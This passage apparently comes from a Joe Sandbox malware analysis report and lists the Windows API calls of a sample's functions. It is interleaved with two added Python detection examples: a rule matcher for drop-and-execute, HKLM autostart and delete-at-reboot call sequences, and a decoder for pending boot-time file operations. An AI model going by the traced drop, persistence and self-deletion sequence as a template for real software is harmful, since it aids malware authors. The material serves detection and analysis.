                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$LibraryLoad
                                                                  • String ID: $$$$&$1$1$6$6$7$9$;$<$@$H$H$I$I$J$L$L$L$M$M$S$S$S$T$T$W$X$X$_$`$`$g$i$m$o$p$t$u$|$~
                                                                  • API String ID: 2238633743-2441341231
                                                                  • Opcode ID: e2dc3851afeb3bcb58ee0b1189764dea58b54e676dc674a3f0b7cb1962383261
                                                                  • Instruction ID: f0a6fbca38eaa9f6d36dd2073cba8300d351a760273fb7828a6aeea559b7586c
                                                                  • Opcode Fuzzy Hash: e2dc3851afeb3bcb58ee0b1189764dea58b54e676dc674a3f0b7cb1962383261
                                                                  • Instruction Fuzzy Hash: B9A1762010C7C1CDD332D27D984879FBFD11BA3368F484A9DA1E85A2D2D7AA8549C777
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: wsprintf
                                                                  • String ID: )$)$)$)$)$)$/$1$<$<$<$<$<$C$C$C$C$C$C$E$J$K$U$V$V$V$V$V$[$\$]$b$c$f$j$l$q$q$q$q$q$s$s$s$s$s$s$t$u$x$y$z${
                                                                  • API String ID: 2111968516-877203839
                                                                  • Opcode ID: 2b5871d10edba0c0daadef3549677835c7a0ea46b4b24e0847e491320e849e80
                                                                  • Instruction ID: b8cea7b21e1b0b0dd3eef741e46aff7ac42a2e861af7119df59345f413ed0d70
                                                                  • Opcode Fuzzy Hash: 2b5871d10edba0c0daadef3549677835c7a0ea46b4b24e0847e491320e849e80
                                                                  • Instruction Fuzzy Hash: 2BB1E810D0C7D999EB22C2FC94587DEBFB50F27318F580299D5E47B2D2C2AA0249C77A
                                                                  APIs
                                                                  • GetProcessHeap.KERNEL32(00000008,00000104), ref: 0041F51C
                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0041F523
                                                                  • GetSystemDirectoryA.KERNEL32(00000000,00000104), ref: 0041F546
                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000054), ref: 0041F5DA
                                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,?,00000014), ref: 0041F609
                                                                  • CloseHandle.KERNEL32(00000014), ref: 0041F628
                                                                  • CloseHandle.KERNEL32(00000022), ref: 0041F62F
                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0041F634
                                                                  • HeapFree.KERNEL32(00000000), ref: 0041F63B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Process$CloseCreateHandle$AllocDirectoryEventFreeSystem
                                                                  • String ID: $ $"$"$($)$)$*$*$.$0$8$;$D$D$D$D$E$E$L$N$N$P$S$S$T$T$V$Z$`$i$o$p$s$v$z
                                                                  • API String ID: 1999696495-2708113935
                                                                  • Opcode ID: 738ece0ca0369f4287c7408b09edaf122eaf261e57d7ddf3076aad516e63fadf
                                                                  • Instruction ID: 6417ec356ac032fdf8ba3c7335fdffbff661ba0545f4a4a4b03294bf4e60ec5a
                                                                  • Opcode Fuzzy Hash: 738ece0ca0369f4287c7408b09edaf122eaf261e57d7ddf3076aad516e63fadf
                                                                  • Instruction Fuzzy Hash: 40D1062110C7C19AD322CB3C984878FBFD15BA7618F584A9DF1E44B3E2C6A5854AC76B
                                                                  APIs
                                                                  • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,00000001), ref: 00412EBA
                                                                  • RegQueryValueExA.ADVAPI32(000000F2,00000092,00000000,000000EC,?,?,00000000), ref: 00412F74
                                                                  • RegCloseKey.ADVAPI32(00000104), ref: 00412F88
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: CloseOpenQueryValue
                                                                  • String ID: #$%$'$0$0$1$4$4$9$:$;$=$>$>$C$D$D$I$J$L$M$O$R$S$V$W$[$_$`$c$c$d$e$g$h$p$t$v$y$}
                                                                  • API String ID: 3677997916-3213928184
                                                                  • Opcode ID: 805f5db3b6766ee56b7c3c7fc3f70b7fb85de0509d2b3a5550262d5443ef15e8
                                                                  • Instruction ID: 3f64c0876ea013b4995e57e445dd95fb29515ce67b52a393eb856a41c12e0995
                                                                  • Opcode Fuzzy Hash: 805f5db3b6766ee56b7c3c7fc3f70b7fb85de0509d2b3a5550262d5443ef15e8
                                                                  • Instruction Fuzzy Hash: 80A1B32110D7C199D322C67C984874FFFD51BA7228F584A9DF1E44B3E3C2AA8649C76B
                                                                  APIs
                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004131E0
                                                                  • lstrcatA.KERNEL32(?,0042E3FC), ref: 004131F0
                                                                  • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F), ref: 0041320B
                                                                  • lstrlenA.KERNEL32(?), ref: 00413237
                                                                  • RegSetValueExA.ADVAPI32(?,8s2?,00000000,00000001,?,00000000), ref: 00413250
                                                                  • RegCloseKey.ADVAPI32(?,?,8s2?,00000000,00000001,?,00000000), ref: 0041325A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: CloseFileModuleNameOpenValuelstrcatlstrlen
                                                                  • String ID: #$,$0$2$3$7$8s2?$;$?$?$@$B$G$P$P$S$X$\$]$^$_$`$d$e$k$o$r$s$s$t$v$~
                                                                  • API String ID: 2804959344-2516123405
                                                                  • Opcode ID: 5fb862093511ecca7038c8434d92067763cea830cdae3e94af674eb022a143b1
                                                                  • Instruction ID: 3ee603018d8f15d3993d5d5bb64ccc4771c2b301eb19da9cd57cd54bae0688a3
                                                                  • Opcode Fuzzy Hash: 5fb862093511ecca7038c8434d92067763cea830cdae3e94af674eb022a143b1
                                                                  • Instruction Fuzzy Hash: 2091B62100D7C299D322D77C584864FFFE15BA7228F485A9DF1E45B3E3C2A98249C767
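Taken together, the function listings above name several behaviours a sandbox rule would want to match as ordered call sequences rather than as isolated API names: the drop-and-execute chain (GetTempPathA, GetTempFileNameA, CreateFileA with GENERIC_WRITE 0x40000000 and CREATE_ALWAYS, WriteFile, CreateProcessA), preceded by Sleep(0x493E0), which is 300 000 ms, or five minutes; import resolution at run time (LoadLibraryA followed by GetProcAddress); the autostart write (GetModuleFileNameA to get the sample's own path, RegOpenKeyExA on HKEY_LOCAL_MACHINE 0x80000002 with KEY_ALL_ACCESS 0x000F003F, RegSetValueExA with dwType 1, REG_SZ); and, in the GetSystemDirectoryA listing that follows, MoveFileExA with a NULL new name and MOVEFILE_DELAY_UNTIL_REBOOT. The script below is an added example, not Joe Sandbox code or the sample's: it parses call lines in the report's own `Api.MODULE(args), ref: addr` format and matches each behaviour as an ordered subsequence of calls with argument constraints. The rule names, the three-minute sleep threshold and the subsequence approach are this example's own choices; the sample traces are copied from the listings on this page.

```python
"""Match behaviour rules against Joe Sandbox style API call listings.

Added example for this report, not Joe Sandbox code or the sample's code.
Rule names, thresholds and the subsequence matching are this example's own;
the sample traces are copied from the function listings on this page.
"""
import re
from typing import Callable, Dict, List, Optional, Tuple

# One report line:  • Api.MODULE(arg,arg,...), ref: 0041ABCD
CALL_RE = re.compile(
    r"^\s*•?\s*(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$")


def parse_calls(lines: List[str]) -> List[dict]:
    """Turn report lines into {api, module, args, ref}; lines that are not calls are skipped."""
    calls = []
    for line in lines:
        m = CALL_RE.match(line)
        if not m:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        calls.append({"api": m["api"], "module": m["mod"], "args": args, "ref": int(m["ref"], 16)})
    return calls


def hex_arg(arg: str) -> Optional[int]:
    """'000493E0' -> 300000, '00000004(MOVEFILE_DELAY_UNTIL_REBOOT)' -> 4, '?' -> None."""
    m = re.match(r"^([0-9A-Fa-f]{8})", arg)
    return int(m.group(1), 16) if m else None


def arg_hex(i: int, test: Callable[[int], bool]) -> Callable[[List[str]], bool]:
    """Predicate over an argument list: argument i decodes to a number that passes `test`."""
    def pred(args: List[str]) -> bool:
        v = hex_arg(args[i]) if i < len(args) else None
        return v is not None and test(v)
    return pred


Step = Tuple[str, Optional[Callable[[List[str]], bool]]]
RULES: Dict[str, List[Step]] = {
    # temp path, temp name, open for GENERIC_WRITE (0x40000000), write, then run it
    "drop_to_temp_and_execute": [
        ("GetTempPathA", None), ("GetTempFileNameA", None),
        ("CreateFileA", arg_hex(1, lambda v: (v & 0x40000000) != 0)),
        ("WriteFile", None), ("CreateProcessA", None)],
    # NULL new name plus MOVEFILE_DELAY_UNTIL_REBOOT (0x4): file is deleted on next boot
    "delete_at_reboot": [("MoveFileExA", lambda a: arg_hex(1, lambda v: v == 0)(a)
                                                  and arg_hex(2, lambda v: (v & 0x4) != 0)(a))],
    "runtime_import_resolution": [("LoadLibraryA", None), ("GetProcAddress", None)],
    # own module path -> HKEY_LOCAL_MACHINE (0x80000002) -> RegSetValueEx
    "hklm_autostart_write": [("GetModuleFileNameA", None),
                             ("RegOpenKeyExA", arg_hex(0, lambda v: v == 0x80000002)),
                             ("RegSetValueExA", None)],
    "long_sleep": [("Sleep", arg_hex(0, lambda v: v >= 180_000))],   # three minutes or more
}


def match_rule(calls: List[dict], steps: List[Step]) -> Optional[List[int]]:
    """Ordered subsequence match: each step must be satisfied by a call after the
    previous step's call.  Returns the ref addresses of the matched calls, or None."""
    refs, i = [], 0
    for call in calls:
        api, pred = steps[i]
        if call["api"] == api and (pred is None or pred(call["args"])):
            refs.append(call["ref"])
            i += 1
            if i == len(steps):
                return refs
    return None


def scan(lines: List[str]) -> Dict[str, List[int]]:
    """Map every matched rule name to the refs of the calls that satisfied it."""
    calls = parse_calls(lines)
    found = {name: match_rule(calls, steps) for name, steps in RULES.items()}
    return {name: refs for name, refs in found.items() if refs}


# Sample traces copied from the function listings on this page.
TRACE_DROP_AND_RUN = [
    "• Sleep.KERNEL32(000493E0), ref: 00401C28",
    "• Sleep.KERNEL32(000003E8), ref: 00401C4B",
    "• GetTempPathA.KERNEL32(00000104,?), ref: 00401D10",
    "• GetTempFileNameA.KERNEL32(?,0042E290,00000000,?), ref: 00401D2D",
    "• CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00401D5A",
    "• WriteFile.KERNEL32(00000000,00000007,?,?,00000000), ref: 00401D7B",
    "• CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00401DD0",
]
TRACE_AUTOSTART = [
    "• GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004131E0",
    "• lstrcatA.KERNEL32(?,0042E3FC), ref: 004131F0",
    "• RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F), ref: 0041320B",
    "• RegSetValueExA.ADVAPI32(?,8s2?,00000000,00000001,?,00000000), ref: 00413250",
]
TRACE_IMPORTS = [
    "• GetProcAddress.KERNEL32(00000000,0000008A), ref: 0041DA87",
    "• LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000007,?,00000001), ref: 0041DC17",
    "• GetProcAddress.KERNEL32(00000000,00000000), ref: 0041DCDE",
]
TRACE_DELETE_AT_REBOOT = [
    "• GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00423155",
    "• DeleteFileA.KERNEL32(?), ref: 0042319C",
    "• MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 004231B1",
]

if __name__ == "__main__":
    for name, trace in [("drop", TRACE_DROP_AND_RUN), ("autostart", TRACE_AUTOSTART),
                        ("imports", TRACE_IMPORTS), ("reboot", TRACE_DELETE_AT_REBOOT)]:
        print(name, {k: [f"{r:08X}" for r in v] for k, v in scan(trace).items()})
```

Matching on order and arguments is what keeps these rules from firing on benign installers: GetProcAddress alone is everywhere, but LoadLibraryA followed by GetProcAddress inside one function, or a RegSetValueExA that comes after GetModuleFileNameA and an HKLM open, is the shape the listings above actually show. The `?` placeholders in the report (pointer arguments the sandbox could not resolve) decode to `None` and never satisfy a numeric predicate, so a rule that needs a value the report does not expose will not match on a guess.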
                                                                  APIs
                                                                  • GetSystemDirectoryA.KERNEL32(?,00000104(MAX_PATH)), ref: 00423155
                                                                  • DeleteFileA.KERNEL32(?), ref: 0042319C
                                                                  • MoveFileExA.KERNEL32(?,00000000(NULL new name: the file is deleted at the next reboot),00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 004231B1
                                                                  • DeleteFileA.KERNEL32(?), ref: 004231E9
                                                                  • MoveFileExA.KERNEL32(?,00000000(NULL new name: the file is deleted at the next reboot),00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 004231F7
                                                                  • DeleteFileA.KERNEL32(?), ref: 0042322F
                                                                  • MoveFileExA.KERNEL32(?,00000000(NULL new name: the file is deleted at the next reboot),00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 0042323D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: File$DeleteMove$DirectorySystem
                                                                  • String ID: $"$"$%s\%s$)$)$)$*$;$;$A$D$E$E$E$N$N$N$P$P$P$S$S$S$T$T$T$`$h
                                                                  • API String ID: 84336133-1389313269
                                                                  • Opcode ID: b14c0ae8dd574057b783fe73dec11bd29fa77d45c1026e4e750054b185980695
                                                                  • Instruction ID: 6d08323a6e56f1df77390437f2eab8c0537e31e2364f4842ab75f608d072a465
                                                                  • Opcode Fuzzy Hash: b14c0ae8dd574057b783fe73dec11bd29fa77d45c1026e4e750054b185980695
                                                                  • Instruction Fuzzy Hash: 44B1E96110C7C199D322DA7D9848B8FFFD51BE7218F480E9DB1E45B2D2C2A9824DC7A7
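The DeleteFileA/MoveFileExA pairs in the function above, each with a NULL new name and MOVEFILE_DELAY_UNTIL_REBOOT, are the documented way to ask Windows to remove a file that cannot be deleted now (for example because it is still mapped) at the next boot. Windows records such requests in the REG_MULTI_SZ value PendingFileRenameOperations under HKLM\SYSTEM\CurrentControlSet\Control\Session Manager as (source, target) string pairs, where an empty target means delete and a target prefixed with "!" means replace. That value is the host-side artifact to check after seeing this trace. The Python below is an added example, not code from the report or from the sample: it decodes such a value and flags entries that touch the system directory that GetSystemDirectoryA returned here. The registry blob and the file names in it are constructed for the example rather than read from a live machine.

```python
# Added example (not from the Joe Sandbox report): decode the registry artifact
# that MoveFileExA(existing, NULL, MOVEFILE_DELAY_UNTIL_REBOOT) leaves behind.
#
# PendingFileRenameOperations is a REG_MULTI_SZ of (source, target) pairs in NT
# path form ("\??\C:\..."). An empty target means "delete source at boot"; a
# target starting with '!' means MOVEFILE_REPLACE_EXISTING was requested.
import ntpath

NT_PREFIX = "\\??\\"


def parse_multi_sz(raw: bytes) -> list:
    """Split a REG_MULTI_SZ blob (UTF-16LE, NUL separated, double-NUL ended)."""
    text = raw.decode("utf-16-le")
    # Strip only the final terminator; an empty element in the middle is
    # meaningful (it is the "delete" target), so it must survive the split.
    if text.endswith("\0\0"):
        text = text[:-2]
    elif text.endswith("\0"):
        text = text[:-1]
    return text.split("\0") if text else []


def pending_operations(raw: bytes) -> list:
    """Turn the raw value into a list of {'kind', 'source', 'target'} records."""
    entries = parse_multi_sz(raw)
    if len(entries) % 2:
        raise ValueError("PendingFileRenameOperations must hold (source, target) pairs")
    ops = []
    for src, dst in zip(entries[0::2], entries[1::2]):
        if dst == "":
            kind = "delete"
        elif dst.startswith("!"):
            kind, dst = "replace", dst[1:]
        else:
            kind = "rename"
        ops.append({"kind": kind,
                    "source": src.removeprefix(NT_PREFIX),
                    "target": dst.removeprefix(NT_PREFIX) or None})
    return ops


def flag_system_dir_ops(ops, system_dir=r"C:\Windows\System32"):
    """Return the operations whose source or target lies under the system directory."""
    sysdir = ntpath.normcase(system_dir.rstrip("\\")) + "\\"

    def under(p):
        return p is not None and ntpath.normcase(p).startswith(sysdir)

    return [op for op in ops if under(op["source"]) or under(op["target"])]


def encode_multi_sz(strings) -> bytes:
    """Inverse of parse_multi_sz; used here only to build the constructed sample."""
    return ("\0".join(strings) + "\0\0").encode("utf-16-le")


# Constructed sample value: one pending delete inside System32 (the shape the
# MoveFileExA calls above produce when the immediate DeleteFileA failed) and one
# benign installer-style replace outside it. File names are placeholders.
SAMPLE_VALUE = encode_multi_sz([
    r"\??\C:\Windows\System32\example_dropped.dll", "",
    r"\??\C:\Program Files\Vendor\app.exe.new", r"!\??\C:\Program Files\Vendor\app.exe",
])

if __name__ == "__main__":
    for op in flag_system_dir_ops(pending_operations(SAMPLE_VALUE)):
        print(op)
```

On a live host the same blob comes from `winreg.QueryValueEx` with `REG_MULTI_SZ` already split into a list, so only `pending_operations` needs the raw bytes replaced by that list; the value is world-readable, so the check needs no elevation.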
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(?,74DF0440), ref: 0040C634
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: the same eleven dumps as listed in full for the first function in this listing (identical list, not repeated)
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen
                                                                  • String ID: $$$&$'$($)$+$.$:$;$=$@$A$D$F$I$O$O$O$[$\$`$`$a$a$c$d$g$g$k$n$p$q$u$x$z$}$~
                                                                  • API String ID: 1659193697-1776773038
                                                                  • Opcode ID: 2631a85855c076cd5aacd475e32cb0067b642e929b393d4f98d7008e1ed6a5c1
                                                                  • Instruction ID: a6680903d8d87bbf61f69c5cc6f64f2f96010d0bd9b0eb87acbe41b91fb4e4d2
                                                                  • Opcode Fuzzy Hash: 2631a85855c076cd5aacd475e32cb0067b642e929b393d4f98d7008e1ed6a5c1
                                                                  • Instruction Fuzzy Hash: 53F1C31100C7C2C9D322D63D588878FFFD11BA7228F585B9DF1E89A2E3C6A5810AC767
                                                                  APIs
                                                                  • GetSystemDirectoryA.KERNEL32(?,00000104(MAX_PATH)), ref: 00422115
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: the same eleven dumps as listed in full for the first function in this listing (identical list, not repeated)
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: DirectorySystem
                                                                  • String ID: $"$"$)$)$)$*$;$;$A$D$E$E$E$N$N$N$P$P$P$S$S$S$T$T$T$`$fwe$h
                                                                  • API String ID: 2188284642-27414503
                                                                  • Opcode ID: dcee0e740fe624b1217ea88155760fb8fe99a8999ef861ec3cef7feef8dc3231
                                                                  • Instruction ID: 3c27c6c0b435376128c9c62176485abffcf5cee6cb450e7dbb9848ef72dacce5
                                                                  • Opcode Fuzzy Hash: dcee0e740fe624b1217ea88155760fb8fe99a8999ef861ec3cef7feef8dc3231
                                                                  • Instruction Fuzzy Hash: 75D13A2110C7C28AD322CA3C585879BFFD11BE6318F480B9DE5E45B2D2C7A9864DC7A7
                                                                  APIs
                                                                  • RegOpenKeyExA.ADVAPI32(80000001(HKEY_CURRENT_USER),00000000,00000000,000F003F(KEY_ALL_ACCESS)), ref: 00415A87
                                                                  • RegQueryValueExA.ADVAPI32(?,0042E292(lpValueName: string at 0042E292),00000000,00000000,?,00000013(cbData=19)), ref: 00415AB1
                                                                  • RegCloseKey.ADVAPI32(?,?,0042E292,00000000,00000000,?,00000013), ref: 00415ABE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: the same eleven dumps as listed in full for the first function in this listing (identical list, not repeated)
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: CloseOpenQueryValue
                                                                  • String ID: $)$,$.$1$5$?$@$A$C$K$N$T$T$d$g$h$i$l$n$p$r$s$u$v$w$z
                                                                  • API String ID: 3677997916-1350007012
                                                                  • Opcode ID: fdaef75e701aef0404f417bb4a93cf4983beae994bab8cf610ec57c9fe9431a7
                                                                  • Instruction ID: bf718c844d1271869f6f5a4619d4bc1fbd5c2e1576c271db0d89f6da38526253
                                                                  • Opcode Fuzzy Hash: fdaef75e701aef0404f417bb4a93cf4983beae994bab8cf610ec57c9fe9431a7
                                                                  • Instruction Fuzzy Hash: 0871B72050C7C1DDD322C67C984874FBFD11BA7328F484B8DF1E45A2E6D2AA8649C76B
                                                                  APIs
                                                                  • GetModuleFileNameA.KERNEL32(00000000(NULL: path of the running executable itself),?,00000104(MAX_PATH)), ref: 004123BE
                                                                    • Part of subcall function 0041DF40: CreateFileA.KERNEL32(00000000,00000001(FILE_READ_DATA),00000001(FILE_SHARE_READ),00000000,00000003(OPEN_EXISTING),00000000,00000000,74DF2EE0,00000001,00000000,004123D8,?,?,?), ref: 0041DF78
                                                                    • Part of subcall function 0041DF40: GetFileSize.KERNEL32(00000000,00000000), ref: 0041DF88
                                                                    • Part of subcall function 0041DF40: CloseHandle.KERNEL32(00000000), ref: 0041DF95
                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 004123EE
                                                                  • HeapFree.KERNEL32(00000000), ref: 004123F5
                                                                  • GetProcessHeap.KERNEL32(00000000,?,00000000,00000000), ref: 00412439
                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0041243C
                                                                  • GetProcessHeap.KERNEL32(00000000,?,74DF2EE0,00000001), ref: 0041247E
                                                                  • HeapFree.KERNEL32(00000000), ref: 00412487
                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004124AC
                                                                  • HeapAlloc.KERNEL32(00000000), ref: 004124AF
                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004124C4
                                                                  • HeapFree.KERNEL32(00000000), ref: 004124C7
                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004124FD
                                                                  • HeapFree.KERNEL32(00000000), ref: 00412500
                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0041250E
                                                                  • HeapFree.KERNEL32(00000000), ref: 00412511
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
